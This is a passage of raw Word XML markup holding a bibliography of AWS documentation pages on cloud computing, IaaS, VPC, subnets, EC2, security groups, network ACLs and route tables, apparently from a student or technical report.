        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[3] What is cloud computing? [Online]. Aws.amazon.com [access: 25 December 2025]. Available: https:\\aws.amazon.com\\what-is-cloud-computing\\"</w:instrText>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What is cloud computing?</w:t>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online]. Aws.amazon.com [access: 25 December 2025].</w:t>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE" w:rsidDel="00280CF1">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Available: https://aws.amazon.com/what-is-cloud-computing/</w:t>
      </w:r>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="202" w:name="resource4"/>
    <w:bookmarkEnd w:id="201"/>
    <w:p w14:paraId="5540ABAB" w14:textId="415D3E8A" w:rsidR="00C87849" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="00B37925">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[4] What is IaaS (Infrastructure as a Service)? [Online]. Aws.amazon.com [access 25 December 2025]. Available: https:\\aws.amazon.com\\what-is\\iaas\\"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What is IaaS (Infrastructure as a Service)?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Aws.amazon.com [access 25 December 2025]. Available: https://aws.amazon.com/what-is/iaas/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="202"/>
    <w:p w14:paraId="3114AFA7" w14:textId="5FD8A3B5" w:rsidR="00C87849" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="00FC6DB3">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="203" w:name="resource5"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[5] AWS Security Documentation [Online]. Docs.aws.amazon.com [access: 25 December 2025]. Available: https:\\docs.aws.amazon.com\\security\\"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AWS Security Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Docs.aws.amazon.com [access: 25 December 2025]. Available: https://docs.aws.amazon.com/security/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="203"/>
    <w:p w14:paraId="7BB836B6" w14:textId="70745779" w:rsidR="00272961" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="00272961">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="204" w:name="resource6"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[6] Amazon Virtual Private Cloud Documentation [Online].Docs.aws.amazon.com [access 23 December 2025]. Available: https:\\docs.aws.amazon.com\\vpc\\"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Amazon Virtual Private Cloud Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].Docs.aws.amazon.com [access 23 December 2025]. Available:</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bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://docs.aws.amazon.com/vpc/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="205" w:name="resource7"/>
    <w:bookmarkEnd w:id="204"/>
    <w:p w14:paraId="0F813C09" w14:textId="7FAF72C5" w:rsidR="00C87849" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="002F2EAE">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bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[7] Subnets for your VPC User Guide [Online]. Docs.aws.amazon.com [access 23 December 2025]. Available: https:\\docs.aws.amazon.com\\vpc\\latest\\userguide\\configure-subnets.html"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Subnets for your VPC User Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Docs.aws.amazon.com [access 23 December 2025]. Available: https://docs.aws.amazon.com/vpc/latest/userguide/configure-subnets.html</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="205"/>
    <w:p w14:paraId="06D2CBF6" w14:textId="666EA584" w:rsidR="002F2EAE" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="002F2EAE">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bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="206" w:name="resource8"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[8] Amazon Elastic Compute Cloud Documentation [Online]. Docs.aws.amazon.com [access 23 December 2025] . Available: https:\\docs.aws.amazon.com\\ec2\\"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Amazon Elastic Compute Cloud Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Docs.aws.amazon.com [access 23 December 2025] . Available: https://docs.aws.amazon.com/ec2/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="207" w:name="resource9"/>
    <w:bookmarkEnd w:id="206"/>
    <w:p w14:paraId="5B5F01FE" w14:textId="6B52366A" w:rsidR="002F2EAE" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="002F2EAE">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[9] Security group rules [Online]. Docs.aws.amazon.com [access 23 December 2025]. Available: https:\\docs.aws.amazon.com\\vpc\\latest\\userguide\\security-group-rules.html"</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[9]</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security group rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Docs.aws.amazon.com [access 23 December 2025]. Available:</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sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://docs.aws.amazon.com/vpc/latest/userguide/security-group-rules.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="208" w:name="resource10"/>
    <w:bookmarkEnd w:id="207"/>
    <w:p w14:paraId="26100B5B" w14:textId="17AD0454" w:rsidR="002F2EAE" w:rsidRPr="00D77DFE" w:rsidRDefault="004C316F" w:rsidP="002F2EAE">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[10] Network ACL rules  [Online]. Docs.aws.amazon.com [access 24 December 2025]. Available: https:\\docs.aws.amazon.com\\vpc\\latest\\userguide\\nacl-rules.html"</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[10] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network ACL rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [Online]. Docs.aws.amazon.com [access 24 December 2025]. Available:</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sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://docs.aws.amazon.com/vpc/latest/userguide/nacl-rules.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="209" w:name="resource11"/>
    <w:bookmarkEnd w:id="208"/>
    <w:p w14:paraId="4B31594B" w14:textId="04F6289A" w:rsidR="002F2EAE" w:rsidRPr="00D77DFE" w:rsidRDefault="004C316F" w:rsidP="002F2EAE">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[11] Route table concepts [Online]. Docs.aws.amazon.com [access 25 December 2025]. Available: https:\\docs.aws.amazon.com\\vpc\\latest\\userguide\\RouteTables.html"</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[11] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Route table concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Docs.aws.amazon.com [access 25 December 2025]. Available: https://docs.aws.amazon.com/vpc/latest/userguide/RouteTables.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4227FDF5" w14:textId="7CF955AE" w:rsidR="004C316F" w:rsidRPr="00D77DFE" w:rsidRDefault="002F2EAE" w:rsidP="004C316F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
